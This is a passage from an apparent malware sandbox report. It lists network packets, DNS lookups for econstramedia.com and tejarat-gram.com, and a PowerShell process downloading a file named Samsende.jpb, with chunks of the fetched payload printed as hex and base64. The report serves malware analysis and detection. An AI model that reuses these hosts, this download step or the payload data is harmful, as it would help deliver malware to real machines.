                    Jul 15, 2024 17:37:04.107991934 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.108000040 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.108021021 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.108082056 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.108088970 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.108705044 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.108772993 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.108783007 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.108814955 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.108871937 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.108879089 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.109607935 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.109668016 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.109675884 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.110409975 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.110482931 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.110488892 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.110552073 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.110614061 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.110621929 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.111203909 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.111274958 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.111282110 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.111303091 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.111375093 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.111386061 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.111424923 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.111459017 CEST44349730103.211.216.55192.168.2.4
                    Jul 15, 2024 17:37:04.111510038 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:04.115969896 CEST49730443192.168.2.4103.211.216.55
                    Jul 15, 2024 17:37:45.422970057 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:45.423022985 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:45.423156023 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:45.465473890 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:45.465519905 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:55.387281895 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:55.387516022 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:55.446934938 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:55.446975946 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:55.447874069 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:55.447964907 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:55.451622009 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:55.496499062 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:55.809861898 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:55.809926033 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:55.810059071 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:55.810059071 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:55.810079098 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:55.810188055 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:55.979829073 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:55.979916096 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:55.980263948 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:55.980348110 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:55.981096983 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:55.981168032 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.032140017 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.032238960 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.155885935 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.156024933 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.156181097 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.156200886 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.156255960 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.156630993 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.156708956 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.157309055 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.157388926 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.158117056 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.158180952 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.158945084 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.159015894 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.202478886 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.202588081 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.202959061 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.203053951 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.325731039 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.325819969 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.326303959 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.326370955 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.326541901 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.326607943 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.327231884 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.327297926 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.327837944 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.327903032 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.328105927 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.328171968 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.328804970 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.328917980 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.329438925 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.329499960 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.329912901 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.329979897 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.330564976 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.330630064 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.331298113 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.331373930 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.331547022 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.331614017 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.373101950 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.373203993 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.373291969 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.373358011 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.373637915 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.373698950 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.414638996 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.414747000 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.414967060 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.415041924 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.496598959 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.496766090 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.496788979 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.496866941 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.497056007 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.497114897 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.497453928 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.497530937 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.497539043 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.497592926 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.497626066 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.497661114 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.497670889 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.497685909 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.497715950 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.497730970 CEST49737443192.168.2.4185.83.114.124

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 15, 2024 17:37:01.166383982 CEST5886153192.168.2.41.1.1.1
                    Jul 15, 2024 17:37:01.448771954 CEST53588611.1.1.1192.168.2.4
                    Jul 15, 2024 17:37:45.317444086 CEST6316053192.168.2.41.1.1.1
                    Jul 15, 2024 17:37:45.410852909 CEST53631601.1.1.1192.168.2.4

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 15, 2024 17:37:01.166383982 CEST192.168.2.41.1.1.10xde13Standard query (0)econstramedia.comA (IP address)IN (0x0001)false
                    Jul 15, 2024 17:37:45.317444086 CEST192.168.2.41.1.1.10xb808Standard query (0)tejarat-gram.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 15, 2024 17:37:01.448771954 CEST1.1.1.1192.168.2.40xde13No error (0)econstramedia.com103.211.216.55A (IP address)IN (0x0001)false
                    Jul 15, 2024 17:37:45.410852909 CEST1.1.1.1192.168.2.40xb808No error (0)tejarat-gram.com185.83.114.124A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • econstramedia.com
                    • tejarat-gram.com

                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449730103.211.216.554436716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    TimestampBytes transferredDirectionData
                    2024-07-15 15:37:02 UTC173OUTGET /Samsende.jpb HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                    Host: econstramedia.com
                    Connection: Keep-Alive
                    2024-07-15 15:37:03 UTC209INHTTP/1.1 200 OK
                    Date: Mon, 15 Jul 2024 15:37:02 GMT
                    Server: Apache
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Last-Modified: Thu, 11 Jul 2024 11:48:44 GMT
                    Accept-Ranges: bytes
                    Content-Length: 483164
                    2024-07-15 15:37:03 UTC7983INData Raw: 63 51 47 62 36 77 4a 71 72 62 73 44 6f 42 6b 41 36 77 4a 32 61 33 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 6e 45 49 75 55 6f 57 77 33 52 78 41 5a 74 78 41 5a 75 42 38 52 72 51 30 64 62 72 41 72 37 58 63 51 47 62 67 65 6c 51 78 68 4b 69 36 77 4c 52 7a 48 45 42 6d 2b 73 43 72 64 46 78 41 5a 75 36 77 70 70 33 71 65 73 43 43 33 62 72 41 6a 48 51 36 77 4b 66 2b 58 45 42 6d 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 36 77 4a 50 48 6e 45 42 6d 39 48 69 63 51 47 62 63 51 47 62 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6d 39 67 6c 51 46 66 4d 35 78 41 5a 76 72 41 68 67 69 69 30 51 6b 42 48 45 42 6d 2b 73 43 50 67 53 4a 77 2b 73 43 35 46 4e 78 41 5a 75 42 77 35 53 62 4a 41 56 78 41 5a 76 72 41 6d 41 68 75 73 56 48 4c 56 42 78 41 5a 74 78 41 5a 75 42 38 6c 70
                    Data Ascii: cQGb6wJqrbsDoBkA6wJ2a3EBmwNcJARxAZvrAnEIuUoWw3RxAZtxAZuB8RrQ0dbrAr7XcQGbgelQxhKi6wLRzHEBm+sCrdFxAZu6wpp3qesCC3brAjHQ6wKf+XEBmzHKcQGbcQGbiRQL6wJPHnEBm9HicQGbcQGbg8EEcQGbcQGbgfm9glQFfM5xAZvrAhgii0QkBHEBm+sCPgSJw+sC5FNxAZuBw5SbJAVxAZvrAmAhusVHLVBxAZtxAZuB8lp
                    2024-07-15 15:37:03 UTC8000INData Raw: 78 50 70 63 37 51 4c 63 41 2f 6b 75 65 41 33 4f 61 42 74 49 55 57 48 4c 61 34 6c 7a 4b 41 38 4a 38 6f 44 47 38 6a 7a 71 4c 79 48 62 71 41 2f 49 39 59 75 56 6a 68 38 49 46 4e 6d 6e 39 54 31 70 54 58 30 62 74 36 2b 4d 6c 73 53 30 45 4d 36 67 62 31 66 30 41 79 4d 70 2f 4f 6e 64 77 57 69 6f 6b 67 6e 59 75 32 4f 7a 32 32 79 35 41 47 35 32 65 45 43 2f 5a 67 56 4c 63 79 37 75 41 67 7a 51 4f 6d 6a 78 33 70 44 34 33 74 65 43 31 41 75 77 66 54 58 53 6d 51 2f 4f 43 74 66 68 44 42 59 56 7a 54 55 51 64 45 36 65 6b 5a 35 4a 46 59 54 30 39 55 65 51 4e 30 4c 75 57 45 6e 4d 55 46 65 32 65 2b 4a 79 6f 6f 58 6b 58 48 52 77 44 53 43 31 55 74 47 53 6e 76 55 4d 47 6f 53 6d 79 50 73 76 50 41 74 38 4c 70 4d 33 4c 32 34 64 76 76 71 72 2f 47 38 73 78 6a 57 59 71 50 78 6b 32 42 75
                    Data Ascii: xPpc7QLcA/kueA3OaBtIUWHLa4lzKA8J8oDG8jzqLyHbqA/I9YuVjh8IFNmn9T1pTX0bt6+MlsS0EM6gb1f0AyMp/OndwWiokgnYu2Oz22y5AG52eEC/ZgVLcy7uAgzQOmjx3pD43teC1AuwfTXSmQ/OCtfhDBYVzTUQdE6ekZ5JFYT09UeQN0LuWEnMUFe2e+JyooXkXHRwDSC1UtGSnvUMGoSmyPsvPAt8LpM3L24dvvqr/G8sxjWYqPxk2Bu
                    2024-07-15 15:37:03 UTC8000INData Raw: 30 54 6c 76 72 49 36 4d 49 53 4e 46 46 6b 67 53 71 6c 6f 30 47 52 7a 39 62 36 64 70 39 4e 6f 36 6a 39 4a 67 6f 6c 47 6e 66 65 42 4a 57 73 71 34 75 72 79 66 69 6b 4c 4b 53 36 4b 58 4b 59 71 36 2f 6c 41 6d 68 36 63 32 43 4e 41 48 4e 64 66 73 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 52 31 4d 65 73 70 30 49 64 37 45 4f 51 43 6a 63 38 32 47 57 32 32 49 36 33 4f 2f 34 64 5a 48 6a 55 4f 7a 41 76 75 57 48 4c 30 30 6b 64 73 41 39 70 2b 43 63 38 33 6a 7a 72 71 43 32 4b 30 41 2f 49 74 73 63 6f 53 6a 7a 71 30 2f 64 62 47 43 7a 4b 6c 50 63 56 62 4e 43 38 34 46 36 2b 72 42 7a 47 76 66 52 33 6e 64 57 59 41 4d 42 5a 34 4a 55 42 4e 47 2b 68 53 79 75 59 6f 61 6c 78 48 46 36 67 50 7a 49 4c 4c 33 70 52 4f 72 76 77 4d 59 72
                    Data Ascii: 0TlvrI6MISNFFkgSqlo0GRz9b6dp9No6j9JgolGnfeBJWsq4uryfikLKS6KXKYq6/lAmh6c2CNAHNdfsOzII0DsyCNA7MgjQOzII0DsyCNA7MgjR1Mesp0Id7EOQCjc82GW22I63O/4dZHjUOzAvuWHL00kdsA9p+Cc83jzrqC2K0A/ItscoSjzq0/dbGCzKlPcVbNC84F6+rBzGvfR3ndWYAMBZ4JUBNG+hSyuYoalxHF6gPzILL3pROrvwMYr
                    2024-07-15 15:37:03 UTC8000INData Raw: 4c 6a 2b 53 4b 54 4b 4f 4d 44 32 59 65 45 7a 79 59 69 7a 38 6b 6d 6d 45 58 41 75 6d 73 4b 52 4e 33 48 49 35 4b 39 50 44 43 52 37 4c 55 56 4f 55 32 46 36 63 70 62 37 73 6d 31 6f 41 74 32 72 39 37 37 4e 53 4b 73 4e 55 69 66 49 38 36 34 6b 39 73 77 67 50 43 5a 66 52 75 2f 6f 38 69 6e 6f 67 6a 51 41 73 71 50 4a 65 33 54 5a 4e 4e 68 57 39 57 50 74 4c 61 77 75 59 47 6c 55 72 4b 56 50 77 70 4b 67 7a 53 34 31 44 70 50 64 74 64 33 4c 58 49 7a 4a 49 31 44 67 44 54 46 6b 50 4b 6a 64 53 52 69 41 74 73 49 76 55 43 4d 6b 41 4d 30 67 36 69 36 67 4d 78 32 5a 56 4c 43 4b 4b 69 66 4c 78 78 32 4f 6a 45 43 32 6e 71 54 59 47 77 35 47 4f 78 44 69 74 6b 6d 6b 31 31 77 70 50 54 65 4c 58 35 32 78 2b 56 4c 55 31 31 57 4e 77 69 7a 37 30 78 58 65 52 4f 69 4a 77 62 2b 4d 48 71 74 36
                    Data Ascii: Lj+SKTKOMD2YeEzyYiz8kmmEXAumsKRN3HI5K9PDCR7LUVOU2F6cpb7sm1oAt2r977NSKsNUifI864k9swgPCZfRu/o8inogjQAsqPJe3TZNNhW9WPtLawuYGlUrKVPwpKgzS41DpPdtd3LXIzJI1DgDTFkPKjdSRiAtsIvUCMkAM0g6i6gMx2ZVLCKKifLxx2OjEC2nqTYGw5GOxDitkmk11wpPTeLX52x+VLU11WNwiz70xXeROiJwb+MHqt6
                    2024-07-15 15:37:03 UTC8000INData Raw: 38 5a 57 69 71 70 31 37 70 6e 53 2f 4f 42 76 52 55 39 47 52 76 41 63 31 77 4a 51 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 48 46 6a 4e 72 35 33 63 4a 6f 64 75 32 36 7a 61 30 47 34 69 61 2b 69 45 64 35 47 56 76 77 37 31 65 61 71 41 7a 41 4f 51 77 65 6f 44 73 79 43 55 67 45 4c 73 44 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6c 6e 4c 46 66 4e 30 67 77 70 38 35 30 46 48 7a 32 69 30 52 2f 2b 33 7a 77 42 30 49 35 48 4f 4a 56 37 31 4a 32 43 49 54 52 36 2f 4b 4c 5a 75 42 58 54 39 77 4d 37 73 52 66 34 42 2b 66 4b 59 37 75 33 6d 4d 76 41 77 44 70 34 34 77 4c 33 69 50 4c 58 38 69 4c 64 6f 6e 55 31 41 66 72 4b 4f 69 72 58 38 44 58 78 4d 75 6b 31 41 62 61 44 2b 2f 4c
                    Data Ascii: 8ZWiqp17pnS/OBvRU9GRvAc1wJQ7MgjQOzII0DsyCNA7MgjQOzII0DsyCNHFjNr53cJodu26za0G4ia+iEd5GVvw71eaqAzAOQweoDsyCUgELsDQOzII0DsyCNA7MgjQOzII0DsyCNA7MglnLFfN0gwp850FHz2i0R/+3zwB0I5HOJV71J2CITR6/KLZuBXT9wM7sRf4B+fKY7u3mMvAwDp44wL3iPLX8iLdonU1AfrKOirX8DXxMuk1AbaD+/L
                    2024-07-15 15:37:03 UTC8000INData Raw: 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 7a 39 41 47 75 46 4c 36 71 52 33 65 6a 4c 36 74 36 2f 67 49 63 4a 4c 5a 78 46 6f 4d 45 7a 47 51 6f 44 39 78 36 6b 64 32 61 50 4a 38 4e 4d 5a 4e 2f 52 4f 77 2f 2f 31 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6c 49 55 53 6c 70 76 52 59 50 66 35 4a 45 39 63 38 33 4d 6f 51 6e 65 68 56 47 74 4e 67 37 4d 30 34 30 70 79 6f 52 49 6a 7a 30 77 72 58 47 6e 41 38 55 7a 66 50 73 6a 68 38 58 50 5a 73 2b 77 73 78 4f 6b 5a 78 61 78 32 58 68 45 72 4e 4a 57 49 48 43 31 4f 6c 54 63 72 52 30 39 72 6e 48 2b 49 71 72 77 41 6b 42 67 43 32 30 65 72 32 41 69 4c 47 4c 46 48 57 6e 49 6f 37 6e 63 31 31 65 64 4f 34 36 4c 52 66 57 31 2f 37 54 53 51 63 31 4e 51 31
                    Data Ascii: OzII0DsyCNA7MgjQOzII0Dsz9AGuFL6qR3ejL6t6/gIcJLZxFoMEzGQoD9x6kd2aPJ8NMZN/ROw//1jQOzII0DsyCNA7MgjQOzII0DsyCNA7MglIUSlpvRYPf5JE9c83MoQnehVGtNg7M040pyoRIjz0wrXGnA8UzfPsjh8XPZs+wsxOkZxax2XhErNJWIHC1OlTcrR09rnH+IqrwAkBgC20er2AiLGLFHWnIo7nc11edO46LRfW1/7TSQc1NQ1
                    2024-07-15 15:37:03 UTC8000INData Raw: 69 32 74 57 4c 6d 54 70 54 4e 6f 30 7a 6a 6a 75 4b 57 2f 6b 77 44 70 50 5a 44 50 71 55 30 37 2b 44 4e 49 4d 30 44 73 4e 46 43 76 2f 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 36 31 4d 38 39 51 75 6b 66 32 72 4b 50 48 4b 2f 37 30 30 41 59 52 63 6f 64 76 66 2f 6d 45 2b 4c 63 64 43 64 50 72 44 63 59 50 4f 44 45 63 74 66 54 67 75 41 62 7a 6d 6c 2f 55 35 30 45 67 41 61 58 46 68 47 42 6a 38 6d 70 53 34 73 79 43 4f 77 38 2f 62 44 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6b 77 6a 4a 6b 66 39 78 39 61 32 73 4c 77 63 75 52 49 71 41 71 62 2f 4f 56 6a 6e 67 45 45 51 43 34 6d 56 7a 59 49 30 73 53 47 31 6b 4c 69 63 4f 74 63 66 2b 4b 45 42 43 4f 46 7a 6a 54 74 48 42 6c
                    Data Ascii: i2tWLmTpTNo0zjjuKW/kwDpPZDPqU07+DNIM0DsNFCv/MgjQOzII0DsyCNA7MgjQOzII0DsyCNA61M89Qukf2rKPHK/700AYRcodvf/mE+LcdCdPrDcYPODEctfTguAbzml/U50EgAaXFhGBj8mpS4syCOw8/bDQOzII0DsyCNA7MgjQOzII0DsyCNA7MgkwjJkf9x9a2sLwcuRIqAqb/OVjngEEQC4mVzYI0sSG1kLicOtcf+KEBCOFzjTtHBl
                    2024-07-15 15:37:03 UTC8000INData Raw: 4e 73 66 59 31 41 55 6c 2f 49 77 37 4d 31 59 75 38 50 72 77 75 6a 77 74 35 53 63 33 6f 41 2f 4e 64 58 48 2f 30 58 6c 41 4c 31 41 66 30 48 37 44 50 74 5a 4c 67 72 55 66 42 54 61 70 6f 58 72 4e 5a 4b 4a 35 61 34 35 38 63 36 73 57 54 44 71 2f 30 6e 4d 72 71 51 61 63 4e 52 6d 47 71 75 2f 39 57 71 67 66 2f 55 54 4d 33 6f 41 37 4d 67 73 74 37 70 47 72 4f 66 73 79 43 76 59 4f 78 67 7a 51 4f 6e 44 6f 6b 55 70 30 34 47 59 48 6a 37 66 49 37 46 6a 6e 57 2f 55 57 4b 34 6f 39 68 62 73 75 58 52 50 76 6d 75 2b 4d 36 4d 53 30 33 75 70 6c 37 7a 4d 73 6a 7a 57 7a 6e 61 72 75 6b 43 6a 4e 53 67 75 63 4c 56 6e 57 53 61 33 35 44 30 6f 77 70 50 52 35 46 4f 38 30 4a 53 50 50 35 32 66 66 4e 70 36 38 4e 36 4f 35 6c 76 52 36 38 70 6a 36 76 42 61 64 79 56 61 59 69 7a 49 70 43 37 30
                    Data Ascii: NsfY1AUl/Iw7M1Yu8Prwujwt5Sc3oA/NdXH/0XlAL1Af0H7DPtZLgrUfBTapoXrNZKJ5a458c6sWTDq/0nMrqQacNRmGqu/9Wqgf/UTM3oA7Mgst7pGrOfsyCvYOxgzQOnDokUp04GYHj7fI7FjnW/UWK4o9hbsuXRPvmu+M6MS03upl7zMsjzWznarukCjNSgucLVnWSa35D0owpPR5FO80JSPP52ffNp68N6O5lvR68pj6vBadyVaYizIpC70
                    2024-07-15 15:37:03 UTC8000INData Raw: 48 68 4f 37 43 6f 37 47 74 70 2f 43 56 6c 5a 56 38 6d 56 79 35 63 74 50 42 4d 58 32 71 69 46 43 50 2b 4b 5a 49 4e 77 4d 51 74 53 4c 6f 61 44 2f 55 72 33 32 42 6e 73 79 43 4e 4f 5a 62 7a 6a 41 4f 4a 46 64 67 44 73 7a 53 6a 4b 31 41 66 37 41 4c 5a 37 6b 79 45 50 6c 69 48 6d 39 66 74 35 72 74 72 72 4a 6c 6b 6b 56 6a 50 51 39 52 75 76 5a 33 36 67 76 4e 64 54 67 66 6e 44 48 56 53 73 73 4d 52 79 4e 71 45 6e 58 6b 78 51 41 49 68 78 52 75 78 57 45 49 61 38 77 54 2b 30 74 68 48 55 74 44 47 48 69 34 62 68 4f 39 36 76 43 42 30 49 34 6c 4c 71 73 30 6a 54 61 69 4f 34 72 37 7a 6a 41 4f 6c 74 74 53 4e 77 33 61 59 37 45 59 77 52 70 4f 54 55 58 38 4d 4c 43 62 74 66 6c 54 6e 54 6e 42 54 55 55 76 66 35 54 72 76 51 46 4f 63 76 70 5a 6e 77 47 34 45 58 4e 38 43 34 41 52 6e 52
                    Data Ascii: HhO7Co7Gtp/CVlZV8mVy5ctPBMX2qiFCP+KZINwMQtSLoaD/Ur32BnsyCNOZbzjAOJFdgDszSjK1Af7ALZ7kyEPliHm9ft5rtrrJlkkVjPQ9RuvZ36gvNdTgfnDHVSssMRyNqEnXkxQAIhxRuxWEIa8wT+0thHUtDGHi4bhO96vCB0I4lLqs0jTaiO4r7zjAOlttSNw3aY7EYwRpOTUX8MLCbtflTnTnBTUUvf5TrvQFOcvpZnwG4EXN8C4ARnR
                    2024-07-15 15:37:03 UTC8000INData Raw: 4d 4a 35 53 31 75 31 53 44 4e 41 37 30 2f 56 53 46 53 46 73 4d 38 4b 6f 48 39 55 30 7a 44 36 77 50 7a 49 4a 42 2b 6b 68 74 64 38 6e 50 4c 35 6c 34 70 32 6c 34 4b 4d 2f 62 58 72 37 5a 71 64 50 31 32 41 6c 39 65 49 4c 74 6f 2b 6a 56 31 55 47 64 75 48 79 54 41 50 41 70 65 6e 6b 59 70 70 63 76 47 55 43 34 2b 42 4b 6b 4e 31 65 6d 4d 69 45 6c 4b 33 6b 67 68 59 58 30 65 6d 46 62 5a 43 31 5a 75 52 46 41 38 47 75 4d 43 4b 57 43 39 65 41 71 62 36 50 68 7a 45 42 30 36 6f 2f 50 55 6f 58 78 55 51 62 52 6a 2f 39 57 4b 54 66 39 41 77 66 4e 5a 35 33 55 6a 6a 4f 56 38 34 75 59 67 44 51 4f 4d 63 38 46 4d 6b 30 33 59 41 7a 4d 67 6d 5a 4e 77 39 6b 4d 2b 30 30 76 59 41 7a 4d 67 70 32 4d 35 72 53 31 75 35 69 41 4e 41 37 4a 44 69 63 2f 53 56 6f 4d 34 76 56 52 64 2f 46 42 31 6a
                    Data Ascii: MJ5S1u1SDNA70/VSFSFsM8KoH9U0zD6wPzIJB+khtd8nPL5l4p2l4KM/bXr7ZqdP12Al9eILto+jV1UGduHyTAPApenkYppcvGUC4+BKkN1emMiElK3kghYX0emFbZC1ZuRFA8GuMCKWC9eAqb6PhzEB06o/PUoXxUQbRj/9WKTf9AwfNZ53UjjOV84uYgDQOMc8FMk03YAzMgmZNw9kM+00vYAzMgp2M5rS1u5iANA7JDic/SVoM4vVRd/FB1j


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
